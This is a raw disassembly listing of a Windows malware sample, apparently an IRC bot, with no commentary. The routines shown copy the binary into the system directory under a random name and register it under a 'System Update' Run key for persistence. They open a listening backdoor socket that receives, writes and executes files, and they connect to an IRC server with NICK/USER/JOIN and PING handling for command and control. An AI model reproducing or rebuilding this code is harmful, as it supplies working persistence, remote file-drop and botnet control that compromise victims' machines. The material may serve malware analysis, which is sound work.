lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jnz short loc_315025E8
push ebx
push edi
push esi
call sub_315023AF
lea eax, [ebp+var_138]
push eax
call sub_31502490
add esp, 10h
loc_315025E8: ; CODE XREF: sub_31502548+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_315025B1
pop edi
pop esi
pop ebx
leave
retn
sub_31502548 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315025F6 proc near ; CODE XREF: sub_315026C2+D1�p
; sub_315026C2+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_3150260B
push [ebp+arg_0]
call dword_31501094 ; DeleteFileA
loc_3150260B: ; CODE XREF: sub_315025F6+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31501068 ; GetSystemDirectoryA
test eax, eax
jz locret_315026C0
push esi
call dword_31501124 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31501932
mov esi, dword_3150106C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset asc_31505CF0 ; "\\"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31501070 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_315010A0 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_3150243D
add esp, 14h
push ds:dword_31506164
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31501074 ; WinExec
push 1F4h
call dword_315010A4 ; Sleep
push 0
call dword_3150109C ; ExitProcess
pop esi
locret_315026C0: ; CODE XREF: sub_315025F6+23�j
leave
retn
sub_315025F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315026C2 proc near ; CODE XREF: UPX0:31501D64�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31501060 ; GetModuleFileNameA
test eax, eax
jz loc_315027FB
and ds:dword_315061A0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jz short loc_31502748
call dword_31501124 ; rand
push 0Ah
mov ebx, offset aDfashnzdsdl ; "dfashnzdsdl"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31501932
pop ecx
pop ecx
push ebx
call dword_315010A0 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_3150243D
add esp, 14h
jmp short loc_31502757
; ---------------------------------------------------------------------------
loc_31502748: ; CODE XREF: sub_315026C2+4D�j
lea eax, [ebp+var_20]
push eax
push offset aDfashnzdsdl ; "dfashnzdsdl"
call dword_31501088 ; lstrcpyA
loc_31502757: ; CODE XREF: sub_315026C2+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jz short loc_3150279D
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_3150243D
lea eax, [ebp+var_84]
push eax
push 0
call sub_315025F6
add esp, 1Ch
jmp short loc_315027FB
; ---------------------------------------------------------------------------
loc_3150279D: ; CODE XREF: sub_315026C2+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31501064 ; lstrcmpiA
test eax, eax
jnz short loc_315027E6
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jnz short loc_315027FB
push ebx
push edi
push esi
mov ds:dword_315061A0, 1
call sub_315023AF
add esp, 0Ch
jmp short loc_315027FB
; ---------------------------------------------------------------------------
loc_315027E6: ; CODE XREF: sub_315026C2+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_315025F6
pop ecx
pop ecx
loc_315027FB: ; CODE XREF: sub_315026C2+1F�j
; sub_315026C2+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_315026C2 endp
; =============== S U B R O U T I N E =======================================
sub_31502800 proc near ; CODE XREF: sub_31501BA8+7A�p
; sub_315028AE+2A�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3150105C ; VirtualAlloc
retn
sub_31502800 endp
; =============== S U B R O U T I N E =======================================
sub_31502814 proc near ; CODE XREF: sub_315028AE+EB�p
; sub_31502B4C+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31501058 ; VirtualFree
retn
sub_31502814 endp
; =============== S U B R O U T I N E =======================================
sub_31502826 proc near ; CODE XREF: sub_31502B4C+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31501088 ; lstrcpyA
mov eax, esi
pop esi
retn
sub_31502826 endp
; =============== S U B R O U T I N E =======================================
sub_3150283F proc near ; CODE XREF: sub_31502B4C+3A�p
push ebx
push ebp
mov ebx, dword_31501018
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+0Eh]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_3150286E
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_3150286E
push 1
pop eax
jmp short loc_3150288E
; ---------------------------------------------------------------------------
loc_3150286E: ; CODE XREF: sub_3150283F+1B�j
; sub_3150283F+28�j
add edi, 12h
push edi
push ebp
push ebp
push 114h
push offset dword_31505CF8
push dword ptr [esi]
call dword_3150101C ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3150288E: ; CODE XREF: sub_3150283F+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_3150283F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31502893 proc near ; CODE XREF: sub_31502B4C+7E�p
push esi
mov esi, ecx
push dword ptr [esi+12h]
call dword_31501010 ; CryptDestroyKey
push 0
push dword ptr [esi+0Eh]
call dword_31501014 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_31502893 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315028AE proc near ; CODE XREF: sub_31502B4C+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_31501050 ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_31501054 ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_31502800
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_315011A0 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_31503A44 ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_3150298F
jl short loc_3150291C
cmp ecx, 61C46800h
ja short loc_3150298F
loc_3150291C: ; CODE XREF: sub_315028AE+64�j
cmp eax, 0FFFFFFF7h
jl short loc_3150298F
jg short loc_3150292B
cmp ecx, 9E3B9800h
jb short loc_3150298F
loc_3150292B: ; CODE XREF: sub_315028AE+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+0Eh]
call dword_31501000 ; CryptCreateHash
test eax, eax
jz short loc_31502980
push 0
push 8
push esi
push [ebp+var_4]
call dword_31501004 ; CryptHashData
test eax, eax
jz short loc_31502980
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_31502980
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+12h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31501008 ; CryptVerifySignatureA
test eax, eax
jnz short loc_315029A8
loc_31502980: ; CODE XREF: sub_315028AE+98�j
; sub_315028AE+AA�j ...
call dword_31501098 ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
loc_3150298F: ; CODE XREF: sub_315028AE+62�j
; sub_315028AE+6C�j ...
call dword_31501098 ; RtlGetLastWin32Error
push 2
pop esi
loc_31502998: ; CODE XREF: sub_315028AE+117�j
push edi
call sub_31502814
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_315029A8: ; CODE XREF: sub_315028AE+D0�j
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
call dword_31501124 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3150119C ; send
jmp short loc_31502998
sub_315028AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315029C7 proc near ; CODE XREF: sub_31502B4C+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_315029E6
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_31502B3E
; ---------------------------------------------------------------------------
loc_315029E6: ; CODE XREF: sub_315029C7+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31502AF7
lea eax, [ebp+var_220]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_31501048 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_315010A8 ; lstrcpynA
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_315010F0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_31502AE5
mov ebx, dword_3150119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31502A8D
inc [ebp+arg_4]
loc_31502A8D: ; CODE XREF: sub_315029C7+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31502ADA
loc_31502A97: ; CODE XREF: sub_315029C7+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31502ADA
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_3150104C ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31502A97
loc_31502ADA: ; CODE XREF: sub_315029C7+CE�j
; sub_315029C7+E5�j
push [ebp+var_C]
call dword_315010BC ; CloseHandle
jmp short loc_31502B47
; ---------------------------------------------------------------------------
loc_31502AE5: ; CODE XREF: sub_315029C7+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502AF7: ; CODE XREF: sub_315029C7+31�j
cmp [ebp+arg_4], 1
jnz short loc_31502B26
lea eax, [ebp+var_118]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_31501048 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B26: ; CODE XREF: sub_315029C7+134�j
cmp [ebp+arg_4], 3
jnz short loc_31502B47
push dword ptr [edi]
add edi, 4
push edi
call sub_31501962
pop ecx
pop ecx
push 0
push 4
push esi
loc_31502B3E: ; CODE XREF: sub_315029C7+1A�j
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B47: ; CODE XREF: sub_315029C7+11C�j
; sub_315029C7+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_315029C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502B4C proc near ; DATA XREF: sub_31502BE8+AA�o
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_315018BA
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_30]
rep movsd
push [ebp+var_1C]
call dword_315010D8 ; SetEvent
mov esi, 10000h
push esi
call sub_31502800
pop ecx
mov edi, eax
lea ecx, [ebp+var_18]
call sub_31502826
lea ecx, [ebp+var_18]
call sub_3150283F
lea eax, [ebp+var_30]
lea ecx, [ebp+var_18]
push eax
call sub_315028AE
test eax, eax
jnz short loc_31502BC0
loc_31502B9B: ; CODE XREF: sub_31502B4C+72�j
push 0
push esi
push edi
push [ebp+var_30]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_31502BC0
test eax, eax
jz short loc_31502BC0
push eax
push edi
push [ebp+var_30]
call sub_315029C7
add esp, 0Ch
jmp short loc_31502B9B
; ---------------------------------------------------------------------------
loc_31502BC0: ; CODE XREF: sub_31502B4C+4D�j
; sub_31502B4C+5F�j ...
push edi
call sub_31502814
pop ecx
lea ecx, [ebp+var_18]
call sub_31502893
push [ebp+var_30]
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_31502B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31502BE8 proc near ; DATA XREF: sub_31501D96+156�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_3150118C ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_31503A38 ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_31502C19: ; CODE XREF: sub_31502BE8+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31501194 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31501170 ; bind
test eax, eax
jz short loc_31502C43
inc esi
cmp esi, 0Ah
jl short loc_31502C19
loc_31502C43: ; CODE XREF: sub_31502BE8+53�j
push 32h
push [ebp+var_4]
call dword_31501174 ; listen
mov ebx, dword_315010BC
loc_31502C54: ; CODE XREF: sub_31502BE8+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31501178 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_3150108C ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_31502B4C
push esi
push esi
call dword_315010D0 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_31501090 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_31502C54
sub_31502BE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502CB7 proc near ; CODE XREF: sub_31502D3C+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31502CEA
add ebx, 1Ah
loc_31502CEA: ; CODE XREF: sub_31502CB7+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31501110
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502D14
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31502D37
; ---------------------------------------------------------------------------
loc_31502D14: ; CODE XREF: sub_31502CB7+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502D34
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31502D37
; ---------------------------------------------------------------------------
loc_31502D34: ; CODE XREF: sub_31502CB7+68�j
mov al, [ebp+arg_0]
loc_31502D37: ; CODE XREF: sub_31502CB7+5B�j
; sub_31502CB7+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31502CB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502D3C proc near ; CODE XREF: sub_31503722+F7�p
; sub_31503722+137�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31502D97
mov edi, [ebp+arg_0]
push ebx
loc_31502D51: ; CODE XREF: sub_31502D3C+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31502CB7
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31502D7B
cmp bl, 7Ah
jg short loc_31502D7B
movsx esi, bl
sub esi, 61h
loc_31502D7B: ; CODE XREF: sub_31502D3C+32�j
; sub_31502D3C+37�j
cmp bl, 41h
jl short loc_31502D8B
cmp bl, 5Ah
jg short loc_31502D8B
movsx esi, bl
sub esi, 41h
loc_31502D8B: ; CODE XREF: sub_31502D3C+42�j
; sub_31502D3C+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31502D51
pop ebx
jmp short loc_31502D9A
; ---------------------------------------------------------------------------
loc_31502D97: ; CODE XREF: sub_31502D3C+F�j
mov edi, [ebp+arg_0]
loc_31502D9A: ; CODE XREF: sub_31502D3C+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31502D3C endp
; =============== S U B R O U T I N E =======================================
sub_31502DA1 proc near ; CODE XREF: UPX0:3150346E�p
push esi
mov esi, ecx
push 20001h
call sub_31502800
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31502DA1 endp
; =============== S U B R O U T I N E =======================================
sub_31502DB6 proc near ; CODE XREF: UPX0:315034CE�p
; UPX0:31503521�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_315010A8 ; lstrcpynA
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31502DB6 endp
; ---------------------------------------------------------------------------
loc_31502DD4: ; CODE XREF: UPX0:31503AD6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_31502814
push dword ptr [esi+2Ch]
call sub_31502814
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31502DEC proc near ; CODE XREF: UPX0:315034EC�p
; UPX0:3150353F�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_3150118C ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_315019B8
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31501194 ; ntohs
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31501198 ; connect
test eax, eax
jnz loc_31502FF1
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FF1
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31501932
mov ebp, dword_3150113C
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_315010A4
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_315010A0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FF1
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31502F15: ; CODE XREF: sub_31502DEC+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31502F9E
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31501932
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31502FF1
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31502F15
; ---------------------------------------------------------------------------
loc_31502F9E: ; CODE XREF: sub_31502DEC+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31502FFF
loc_31502FF1: ; CODE XREF: sub_31502DEC+4E�j
; sub_31502DEC+6B�j ...
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
push 1
pop eax
jmp short loc_31503021
; ---------------------------------------------------------------------------
loc_31502FFF: ; CODE XREF: sub_31502DEC+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
mov [esi+284h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_31503021: ; CODE XREF: sub_31502DEC+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31502DEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150302E proc near ; CODE XREF: sub_31502DEC+7C�p
; sub_31502DEC+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_315030A8
mov esi, dword_315010A0
lea edi, [eax+4]
push edi
call esi ; lstrlenA
dec eax
cmp eax, 63h
jle short loc_31503067
push 1
pop eax
jmp short loc_315030AA
; ---------------------------------------------------------------------------
loc_31503067: ; CODE XREF: sub_3150302E+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_315010A8 ; lstrcpynA
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3150119C ; send
loc_315030A8: ; CODE XREF: sub_3150302E+20�j
xor eax, eax
loc_315030AA: ; CODE XREF: sub_3150302E+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3150302E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315030B1 proc near ; CODE XREF: UPX0:3150358D�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_3150113C ; wsprintfA
mov edi, dword_315010A4
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_3150317A
test eax, eax
jz short loc_3150317A
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
mov edi, dword_31501120
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503153
push 3
jmp short loc_3150317C
; ---------------------------------------------------------------------------
loc_31503153: ; CODE XREF: sub_315030B1+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503167
push 4
jmp short loc_3150317C
; ---------------------------------------------------------------------------
loc_31503167: ; CODE XREF: sub_315030B1+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_315010A8 ; lstrcpynA
xor eax, eax
jmp short loc_3150317D
; ---------------------------------------------------------------------------
loc_3150317A: ; CODE XREF: sub_315030B1+74�j
; sub_315030B1+78�j
push 2
loc_3150317C: ; CODE XREF: sub_315030B1+A0�j
; sub_315030B1+B4�j
pop eax
loc_3150317D: ; CODE XREF: sub_315030B1+C7�j
pop edi
pop esi
leave
retn 4
